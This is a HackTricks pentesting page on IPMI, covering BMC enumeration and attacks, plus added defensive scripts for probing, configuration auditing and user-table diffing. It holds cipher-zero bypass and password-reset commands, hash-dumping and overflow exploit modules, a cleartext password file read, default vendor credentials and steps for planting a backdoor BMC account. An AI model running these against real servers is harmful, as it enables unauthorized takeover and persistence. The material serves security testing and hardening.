623/UDP/TCP - IPMI
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
Other ways to support HackTricks:
- If you want to see your company advertised in HackTricks or download HackTricks in PDF, check the SUBSCRIPTION PLANS!
- Get the official PEASS & HackTricks swag
- Discover The PEASS Family, our collection of exclusive NFTs
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @carlospolopm.
- Share your hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Basic Information
Overview of IPMI
Intelligent Platform Management Interface (IPMI) offers a standardized approach for remote management and monitoring of computer systems, independent of the operating system or power state. This technology allows system administrators to manage systems remotely, even when they're off or unresponsive, and is especially useful for:
- Pre-OS boot configurations
- Power-off management
- Recovery from system failures
IPMI is capable of monitoring temperatures, voltages, fan speeds, and power supplies, alongside providing inventory information, reviewing hardware logs, and sending alerts via SNMP. Essential for its operation are a power source and a LAN connection.
Since its introduction by Intel in 1998, IPMI has been supported by numerous vendors, enhancing remote management capabilities, especially with version 2.0's support for serial over LAN. Key components include:
- Baseboard Management Controller (BMC): The main micro-controller for IPMI operations.
- Communication Buses and Interfaces: For internal and external communication, including ICMB, IPMB, and various interfaces for local and network connections.
- IPMI Memory: For storing logs and data.
Default Port: 623/UDP/TCP (It's usually on UDP but it could also be running on TCP)
Enumeration
Discovery
nmap -n -p 623 10.0.0.0/24
nmap -n -sU -p 623 10.0.0.0/24
use auxiliary/scanner/ipmi/ipmi_version
You can identify the version using:
nmap -sU --script ipmi-version -p 623 10.10.10.10
use auxiliary/scanner/ipmi/ipmi_version
With valid credentials, ipmitool over the RMCP+ (lanplus) interface exposes the rest of the BMC state:
ipmitool -I lanplus -H <target> -U <username> -P <password> mc info            # BMC device ID and firmware/IPMI version
ipmitool -I lanplus -H <target> -U <username> -P <password> lan print          # LAN channel config, auth types, cipher suite privileges
ipmitool -I lanplus -H <target> -U <username> -P <password> chassis status
ipmitool -I lanplus -H <target> -U <username> -P <password> power status
ipmitool -I lanplus -H <target> -U <username> -P <password> sel list           # System Event Log
ipmitool -I lanplus -H <target> -U <username> -P <password> sdr list           # Sensor Data Records
ipmitool -I lanplus -H <target> -U <username> -P <password> fru list           # Field Replaceable Unit inventory
ipmitool -I lanplus -H <target> -U <username> -P <password> sensor list
ipmitool -I lanplus -H <target> -U <username> -P <password> user list
ipmitool -I lanplus -H <target> -U <username> -P <password> channel info <channel_number>
ipmitool -I lanplus -H <target> -U <username> -P <password> channel getaccess <channel_number>
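As an added example (not code from the original page), the script below implements the session-less RMCP/ASF Presence Ping exchange that IPMI BMCs answer on 623/UDP, and parses the Presence Pong a BMC returns. A defender can point it at their own ranges to inventory which hosts advertise IPMI, or feed it datagrams pulled from a capture to confirm a suspicious response really came from a BMC. The sample Pong bytes are constructed; the field offsets follow the ASF Presence Pong layout (IANA enterprise number 4542, message type 0x40, IPMI support flagged in bit 7 of the "supported entities" byte). Nothing is sent unless a host is passed on the command line.

```python
import socket
import struct
import sys
from typing import Optional

IPMI_PORT = 623
RMCP_VERSION = 0x06
RMCP_CLASS_ASF = 0x06          # RMCP message class 6 = ASF (class 7 = IPMI)
ASF_IANA = 0x000011BE          # IANA enterprise number (4542) carried by ASF messages
ASF_PRESENCE_PING = 0x80
ASF_PRESENCE_PONG = 0x40


def build_presence_ping(tag: int = 0) -> bytes:
    """RMCP header + ASF Presence Ping; sequence 0xFF asks the BMC not to RMCP-ACK it."""
    rmcp_header = bytes([RMCP_VERSION, 0x00, 0xFF, RMCP_CLASS_ASF])
    # ASF header: IANA(4) | message type(1) | message tag(1) | reserved(1) | data length(1)
    asf_header = struct.pack(">IBBBB", ASF_IANA, ASF_PRESENCE_PING, tag & 0xFF, 0x00, 0x00)
    return rmcp_header + asf_header


def parse_presence_pong(data: bytes) -> dict:
    """Decode a Presence Pong datagram; raises ValueError for anything else."""
    if len(data) < 12:
        raise ValueError("too short for an RMCP + ASF header")
    version, _reserved, sequence, msg_class = data[0], data[1], data[2], data[3]
    if version != RMCP_VERSION or (msg_class & 0x7F) != RMCP_CLASS_ASF:
        raise ValueError("not an RMCP ASF message")
    iana, msg_type, tag, _reserved2, data_len = struct.unpack(">IBBBB", data[4:12])
    if iana != ASF_IANA or msg_type != ASF_PRESENCE_PONG:
        raise ValueError("not an ASF Presence Pong")
    if data_len < 16 or len(data) < 28:
        raise ValueError("Presence Pong payload truncated")
    # Pong data: OEM IANA(4) | OEM defined(4) | supported entities(1) | supported interactions(1) | reserved(6)
    oem_iana, oem_defined, entities, interactions = struct.unpack(">IIBB", data[12:22])
    return {
        "rmcp_sequence": sequence,
        "tag": tag,
        "oem_iana": oem_iana,
        "oem_defined": oem_defined,
        "ipmi_supported": bool(entities & 0x80),            # bit 7: IPMI supported
        "asf_version": entities & 0x0F,                     # low nibble: ASF version (1 = ASF 1.0)
        "rmcp_security_extensions": bool(interactions & 0x80),
    }


def probe(host: str, timeout: float = 2.0) -> Optional[dict]:
    """Send one Presence Ping to host:623/udp; returns None if nothing answers in time."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
        sock.settimeout(timeout)
        sock.sendto(build_presence_ping(tag=0x2A), (host, IPMI_PORT))
        try:
            data, _peer = sock.recvfrom(1024)
        except socket.timeout:
            return None
    return parse_presence_pong(data)


# Constructed sample: a Pong answering tag 0x2A from a BMC that supports IPMI and ASF 1.0.
SAMPLE_PONG = bytes.fromhex(
    "0600ff06"            # RMCP: version 6, reserved, seq 0xFF, class ASF
    "000011be"            # ASF IANA enterprise number
    "40" "2a" "00" "10"   # Presence Pong, tag 0x2A, reserved, 16 data bytes follow
    "000011be"            # OEM IANA (no OEM extensions)
    "00000000"            # OEM defined
    "81"                  # supported entities: IPMI (bit 7) + ASF version 1
    "00"                  # supported interactions
    "000000000000"        # reserved
)

if __name__ == "__main__":
    print("constructed sample:", parse_presence_pong(SAMPLE_PONG))
    for host in sys.argv[1:]:
        print(host, probe(host))
```

Any host that answers with `ipmi_supported` set belongs on the management-network inventory; if it is reachable from a general-purpose segment, that is the first finding, before any of the credential checks below.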
IPMI Vulnerabilities
In the realm of IPMI 2.0, a significant security flaw was uncovered by Dan Farmer, exposing a vulnerability through cipher type 0. This vulnerability, documented in detail at Dan Farmer's research, enables unauthorized access with any password provided a valid user is targeted. This weakness was found across various BMCs from manufacturers like HP, Dell, and Supermicro, suggesting a widespread issue within all IPMI 2.0 implementations.
IPMI Authentication Bypass via Cipher 0
To detect this flaw, the following Metasploit auxiliary scanner can be employed:
use auxiliary/scanner/ipmi/ipmi_cipher_zero
Exploitation of this flaw is achievable with ipmitool, as demonstrated below, allowing for the listing and modification of user passwords:
apt-get install ipmitool # Installation command
ipmitool -I lanplus -C 0 -H 10.0.0.22 -U root -P root user list # Lists users
ipmitool -I lanplus -C 0 -H 10.0.0.22 -U root -P root user set password 2 abc123 # Changes password
IPMI 2.0 RAKP Authentication Remote Password Hash Retrieval
The IPMI 2.0 RAKP Authentication Remote Password Hash Retrieval vulnerability enables retrieval of salted hashed passwords (MD5 and SHA1) for any existing username. To test this vulnerability, Metasploit offers a module:
msf > use auxiliary/scanner/ipmi/ipmi_dumphashes
IPMI Anonymous Authentication
Many BMCs have a default configuration that allows "anonymous" access, which is identified by empty username and password strings. This configuration can be exploited to reset passwords of named user accounts using ipmitool:
ipmitool -I lanplus -H 10.0.0.97 -U '' -P '' user list
ipmitool -I lanplus -H 10.0.0.97 -U '' -P '' user set password 2 newpassword
Supermicro IPMI Clear-text Passwords
A critical design choice in IPMI 2.0 necessitates the storage of clear-text passwords within BMCs for authentication purposes. Supermicro's storage of these passwords in locations such as /nv/PSBlock or /nv/PSStore raises significant security concerns:
cat /nv/PSBlock
Supermicro IPMI UPnP Vulnerability
Supermicro's inclusion of a UPnP SSDP listener in its IPMI firmware, particularly on UDP port 1900, introduces a severe security risk. Vulnerabilities in the Intel SDK for UPnP Devices version 1.3.1, as detailed by Rapid7's disclosure, allow for root access to the BMC:
msf> use exploit/multi/upnp/libupnp_ssdp_overflow
Brute Force
HP's Integrated Lights Out (iLO) ships with a default password that is randomized during manufacture; other manufacturers use static default credentials. Default usernames and passwords for various products:
- HP Integrated Lights Out (iLO) default password is a factory randomized 8-character string, providing higher security.
- Dell's iDRAC, IBM's IMM, and Fujitsu's Integrated Remote Management Controller use easily guessable passwords like "calvin", "PASSW0RD" (with a zero), and "admin" respectively.
- Supermicro IPMI (2.0), Oracle/Sun ILOM, and ASUS iKVM BMC also use simple default credentials, with "ADMIN", "changeme", and "admin" as their passwords.
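The cipher 0 bypass and the IPMI 1.5 "NONE" authentication type are both configuration state that a BMC reports in `ipmitool lan print`, so a defender can audit for them without attacking anything. The script below is an added example (not HackTricks code): it parses the `Cipher Suite Priv Max` and `Auth Type Enable` lines of a `lan print` dump, flags cipher suites 0, 1 and 2 (no authentication, or authentication without encryption) and any privilege level that still accepts auth type NONE, and emits the `ipmitool lan set <channel> cipher_privs` / `lan set <channel> auth` commands that close them. It assumes LAN channel 1 and the output layout shown in the constructed sample. Note the caveat this check cannot fix: the RAKP hash retrieval described above is inherent to the RMCP+ handshake for every cipher suite, so the only mitigation for that one is keeping 623/UDP off untrusted networks and using long, non-default passwords.

```python
import re
from typing import Dict, List

# Cipher suites that must not be reachable: 0 is "cipher zero" (any password
# accepted for a valid user); 1 and 2 authenticate but carry traffic unencrypted.
WEAK_CIPHER_SUITES = {
    0: "no authentication, no integrity, no confidentiality (cipher zero)",
    1: "RAKP-HMAC-SHA1 authentication, no integrity, no confidentiality",
    2: "RAKP-HMAC-SHA1 + HMAC-SHA1-96 integrity, no confidentiality",
}

# 'Cipher Suite Priv Max' prints one character per suite ID: X = unused/disabled,
# otherwise the highest privilege level allowed to use it (c/u/o/a/O).
PRIV_MAX_RE = re.compile(r"^Cipher Suite Priv Max\s*:\s*([XcuoaO]+)\s*$", re.M)
# 'Auth Type Enable' block: one line per privilege level listing IPMI 1.5 auth types.
AUTH_ENABLE_RE = re.compile(
    r"^\s*(?:Auth Type Enable\s*)?:\s*(Callback|User|Operator|Admin|OEM)\s*:\s*(.*?)\s*$", re.M)


def parse_cipher_privs(lan_print: str) -> str:
    m = PRIV_MAX_RE.search(lan_print)
    return m.group(1) if m else ""


def audit_lan_print(lan_print: str) -> List[Dict[str, str]]:
    """Return one finding per weak setting visible in an `ipmitool lan print` dump."""
    findings = []
    privs = parse_cipher_privs(lan_print)
    if not privs:
        findings.append({"severity": "info",
                         "issue": "no 'Cipher Suite Priv Max' line (RMCP+ unsupported or output truncated)"})
    for suite_id, priv in enumerate(privs):
        if priv != "X" and suite_id in WEAK_CIPHER_SUITES:
            findings.append({
                "severity": "critical" if suite_id == 0 else "high",
                "issue": f"cipher suite {suite_id} enabled up to privilege '{priv}': "
                         f"{WEAK_CIPHER_SUITES[suite_id]}",
            })
    for level, types in AUTH_ENABLE_RE.findall(lan_print):
        if "NONE" in types.split():
            findings.append({"severity": "critical",
                             "issue": f"IPMI 1.5 authentication type NONE enabled for {level} level"})
    return findings


def remediation_commands(lan_print: str, channel: int = 1) -> List[str]:
    """ipmitool commands that disable what audit_lan_print flagged (channel 1 assumed)."""
    cmds = []
    privs = parse_cipher_privs(lan_print)
    hardened = "".join("X" if i in WEAK_CIPHER_SUITES else c for i, c in enumerate(privs))
    if privs and hardened != privs:
        cmds.append(f"ipmitool lan set {channel} cipher_privs {hardened}")
    for level, types in AUTH_ENABLE_RE.findall(lan_print):
        kept = [t for t in types.split() if t != "NONE"]
        if len(kept) != len(types.split()):
            cmds.append(f"ipmitool lan set {channel} auth {level.upper()} {','.join(kept)}")
    return cmds


# Constructed `ipmitool lan print 1` excerpt from a BMC still in its factory state.
SAMPLE_LAN_PRINT = """\
Set in Progress         : Set Complete
Auth Type Support       : NONE MD2 MD5 PASSWORD
Auth Type Enable        : Callback : MD2 MD5 PASSWORD
                        : User     : NONE MD2 MD5 PASSWORD
                        : Operator : MD2 MD5 PASSWORD
                        : Admin    : MD2 MD5 PASSWORD
                        : OEM      : MD2 MD5 PASSWORD
IP Address Source       : Static Address
IP Address              : 10.0.0.22
RMCP+ Cipher Suites     : 0,1,2,3,6,7,8,11,12
Cipher Suite Priv Max   : aaaaXXaaaXXaaXX
                        :     X=Cipher Suite Unused
                        :     c=CALLBACK
                        :     u=USER
                        :     o=OPERATOR
                        :     a=ADMIN
                        :     O=OEM
"""

if __name__ == "__main__":
    for f in audit_lan_print(SAMPLE_LAN_PRINT):
        print(f"[{f['severity']}] {f['issue']}")
    print("\n".join(remediation_commands(SAMPLE_LAN_PRINT)))
```

Run it against a real dump with `ipmitool -I lanplus -H <bmc> -U <user> -P <pass> lan print 1 > dump.txt` and pass the file contents to `audit_lan_print`; after applying the emitted commands, a second dump should produce no critical or high findings, and the `ipmi_cipher_zero` Metasploit check above should report the BMC as not vulnerable.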
Accessing the Host via BMC
Administrative access to the Baseboard Management Controller (BMC) provides pathways to access the host's operating system. Exploiting the BMC's Keyboard, Video, Mouse (KVM) functionality allows for direct manipulation of the host's disk, including backdoor insertion, data extraction, or security assessment actions. This can be done by rebooting the host to a root shell via GRUB (using init=/bin/sh) or booting from a virtual CD-ROM set as a rescue disk. However, rebooting the host is a significant drawback. Accessing the running host without rebooting is more complex and varies with the host's configuration. If the host's physical or serial console remains logged in, it can be taken over through the BMC's KVM or serial-over-LAN (sol) functionalities via ipmitool. Exploring the exploitation of shared hardware resources, like the i2c bus and Super I/O chip, requires further investigation.
Introducing Backdoors into BMC from the Host
After compromising a host with a BMC, the local BMC interface can be used to insert a backdoor user account, creating a lasting presence on the server. This attack requires ipmitool on the compromised host and the activation of BMC driver support. The following commands show how to inject a new user account into the BMC using the host's local interface, bypassing the need for authentication. This technique is applicable to various operating systems, including Linux, Windows, BSD, and even DOS.
ipmitool user list
ID Name Callin Link Auth IPMI Msg Channel Priv Limit
2 ADMIN true false false Unknown (0x00)
3 root true false false Unknown (0x00)
ipmitool user set name 4 backdoor
ipmitool user set password 4 backdoor
ipmitool user priv 4 4
ipmitool user list
ID Name Callin Link Auth IPMI Msg Channel Priv Limit
2 ADMIN true false false Unknown (0x00)
3 root true false false Unknown (0x00)
4 backdoor true false true ADMINISTRATOR
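Both the anonymous-account default described earlier and the host-side backdoor injection just shown leave their trace in exactly one place: the BMC user table printed by `ipmitool user list`. The script below is an added example (not HackTricks code) that parses that table, flags an enabled anonymous user (empty name) and factory account names such as ADMIN and root, and diffs a fresh snapshot against a known-good baseline so that an added account or a privilege change surfaces whether or not the BMC logged it. The row layout is assumed from the `user list` output above; both snapshots are constructed.

```python
import re
from typing import Dict, List

# One row of `ipmitool user list`: ID, name (empty for the anonymous user),
# Callin, Link Auth, IPMI Msg, Channel Priv Limit.
USER_ROW_RE = re.compile(
    r"^\s*(\d+)\s+(\S*)\s+(true|false)\s+(true|false)\s+(true|false)\s+(.+?)\s*$", re.I)

# Factory account names from the default-credential list above; their presence
# means the factory password has to be confirmed changed.
DEFAULT_ACCOUNT_NAMES = {"admin", "root"}


def parse_user_list(text: str) -> Dict[int, Dict[str, object]]:
    users = {}
    for line in text.splitlines():
        m = USER_ROW_RE.match(line)
        if not m:            # header line, blank line, or an unparsable row
            continue
        users[int(m.group(1))] = {
            "name": m.group(2),
            "callin": m.group(3).lower() == "true",
            "link_auth": m.group(4).lower() == "true",
            "ipmi_msg": m.group(5).lower() == "true",
            "priv": m.group(6),
        }
    return users


def audit_users(users: Dict[int, Dict[str, object]]) -> List[str]:
    """Static checks on one snapshot: anonymous access and factory account names."""
    findings = []
    for uid, u in sorted(users.items()):
        if u["name"] == "" and u["ipmi_msg"]:
            findings.append(f"user {uid}: anonymous (empty username) enabled for IPMI messaging "
                            f"with privilege {u['priv']}; run 'ipmitool user disable {uid}'")
        elif str(u["name"]).lower() in DEFAULT_ACCOUNT_NAMES and u["ipmi_msg"]:
            findings.append(f"user {uid}: factory account name '{u['name']}' enabled; "
                            f"confirm its default password was changed")
    return findings


def diff_users(baseline: Dict[int, Dict[str, object]],
               current: Dict[int, Dict[str, object]]) -> List[str]:
    """Compare a snapshot against a known-good baseline; new or changed rows are alerts."""
    alerts = []
    for uid, u in sorted(current.items()):
        if uid not in baseline:
            alerts.append(f"user {uid} '{u['name']}' ADDED with priv {u['priv']} (ipmi_msg={u['ipmi_msg']})")
            continue
        b = baseline[uid]
        changed = [k for k in ("name", "callin", "link_auth", "ipmi_msg", "priv") if b[k] != u[k]]
        if changed:
            desc = ", ".join(f"{k}: {b[k]!r} -> {u[k]!r}" for k in changed)
            alerts.append(f"user {uid} '{b['name']}' CHANGED ({desc})")
    for uid in sorted(set(baseline) - set(current)):
        alerts.append(f"user {uid} '{baseline[uid]['name']}' REMOVED")
    return alerts


# Constructed snapshots in the `ipmitool user list` layout shown above.
BASELINE_USER_LIST = """\
ID  Name             Callin  Link Auth  IPMI Msg   Channel Priv Limit
1                    true    false      true       ADMINISTRATOR
2   ADMIN            true    false      true       ADMINISTRATOR
3   root             true    false      false      Unknown (0x00)
"""

CURRENT_USER_LIST = """\
ID  Name             Callin  Link Auth  IPMI Msg   Channel Priv Limit
1                    true    false      true       ADMINISTRATOR
2   ADMIN            true    false      true       ADMINISTRATOR
3   root             true    false      true       ADMINISTRATOR
4   backdoor         true    false      true       ADMINISTRATOR
"""

if __name__ == "__main__":
    baseline = parse_user_list(BASELINE_USER_LIST)
    current = parse_user_list(CURRENT_USER_LIST)
    for line in audit_users(current) + diff_users(baseline, current):
        print(line)
```

In practice the baseline is the `user list` output captured right after provisioning; the collector runs `ipmitool user list` from the host (the same local path an attacker uses, which needs no credentials) or over lanplus on a schedule, and any ADDED or CHANGED alert on a production BMC is an incident, not a ticket.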
Shodan
port:623